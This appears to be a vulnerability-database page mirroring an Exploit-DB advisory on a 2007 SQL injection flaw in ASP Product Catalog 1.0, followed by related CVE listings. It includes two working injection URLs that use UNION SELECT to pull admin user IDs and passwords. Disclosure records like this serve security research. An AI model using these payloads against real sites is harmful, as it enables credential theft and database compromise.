Lucene search
Joseph.giron13EDB-ID:30629HistoryOct 01, 2007 - 12:00 a.m.
ASP Product Catalog 1.0 - 'default.asp' SQL Injection
2007-10-0100:00:00
joseph.giron13
www.exploit-db.com
17
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/25884/info
ASP Product Catalog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Catalog/default.asp?cid=8%20union%20all%20select%20Password,User_ID,Password,User_ID,Password,User_ID,Password%20from%20admin#
http://www.example.comdefault.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin Related
cvelist
cvelist
CVE-2008-6875
2009-07-24 16:00:00
cve
cve
CVE-2008-6875
2009-07-24 16:30:00
nvd
nvd
CVE-2008-6875
2009-07-24 16:30:00
prion
prion
Sql injection
2009-07-24 16:30:00